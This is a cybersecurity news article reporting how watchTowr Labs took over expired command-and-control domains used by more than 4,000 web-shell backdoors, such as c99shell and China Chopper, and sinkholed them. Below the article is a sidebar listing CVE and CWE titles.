Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems

No less than 4,000 unique web backdoors previously deployed by various threat actors have been hijacked by taking control of abandoned and expired infrastructure for as little as $20 per domain.
Cybersecurity company watchTowr Labs said it pulled off the operation by registering over 40 domain names that the backdoors had been designed to use for command-and-control (C2). In partnership with the Shadowserver Foundation, the domains implicated in the research have been sinkholed.
"We have been hijacking backdoors (that were reliant on now abandoned infrastructure and/or expired domains) that themselves existed inside backdoors, and have since been watching the results flood in," watchTowr Labs CEO Benjamin Harris and researcher Aliz Hammond said in a technical write-up last week.
"This hijacking allowed us to track compromised hosts as they 'reported in,' and theoretically gave us the power to commandeer and control these compromised hosts."
Among the compromised targets identified by means of the beaconing activity included government entities from Bangladesh, China, and Nigeria; and academic institutions across China, South Korea, and Thailand, among others.
The backdoors, which are nothing but web shells designed to offer persistent remote access to target networks for follow-on exploitation, vary in scope and functionality -
- Simple web shells that are capable of executing an attacker-provided command by means of a PHP code
- c99shell
- r57shell
- China Chopper, a web shell prominently by China-nexus advanced persistent threat (APT) groups

Both c99shell and r57shell are fully-featured web shells with features to execute arbitrary code or commands, perform file operations, deploy additional payloads, brute-force FTP servers, and remove themselves from compromised hosts.
WatchTowr Labs said it observed instances where some of the web shells were backdoored by the script maintainers to leak the locations where they were deployed, thereby inadvertently handing over the reins to other threat actors as well.
The development comes a couple of months after the company revealed it spent a mere $20 to acquire a legacy WHOIS server domain ("whois.dotmobiregistry[.]net") associated with the .mobi top-level domain (TLD), identifying more than 135,000 unique systems that were still communicating with the server even after it had migrated to "whois.nic[.]mobi."
These comprised various private companies, like VirusTotal, as well as mail servers for countless government, military, and university entities. The .gov addresses belonged to Argentina, Bangladesh, Bhutan, Ethiopia, India, Indonesia, Israel, Pakistan, The Philippines, Ukraine, and the U.S.
"It is somewhat encouraging to see that attackers make the same mistakes as defenders," watchTowr Labs said. "It's easy to slip into the mindset that attackers never slip up, but we saw evidence to the contrary – boxes with open web shells, expired domains, and the use of software that has been backdoored."
CVE-2025-22224 VMware ESXi and Workstation TOCTOU Race Condition Vulnerability
CVE-2025-2783 Google Chromium Mojo Sandbox Escape Vulnerability
CVE-2020-29574 CyberoamOS (CROS) SQL Injection Vulnerability
CVE-2022-43769 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability
CVE-2018-8639 Microsoft Windows Win32k Improper Resource Shutdown or Release Vulnerability
CVE-2024-40890 Zyxel DSL CPE OS Command Injection Vulnerability
CVE-2024-49035 Microsoft Partner Center Improper Access Control Vulnerability
CVE-2017-0148 Microsoft SMBv1 Server Remote Code Execution Vulnerability
InformationalGraphQL Server Implementation Identified
InformationalUser Agent Fuzzer
InformationalInformation Disclosure - Sensitive Information in URL
InformationalUser Controllable HTML Element Attribute (Potential XSS)
InformationalSec-Fetch-Dest Header is Missing
CWE-1331 Improper Isolation of Shared Resources in Network On Chip (NoC)
CWE-1252 CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations
CWE-158 Improper Neutralization of Null Byte or NUL Character
MediumCWE-59 Improper Link Resolution Before File Access ('Link Following')
CWE-1060 Excessive Number of Inefficient Server-Side Data Accesses
Free online web security scanner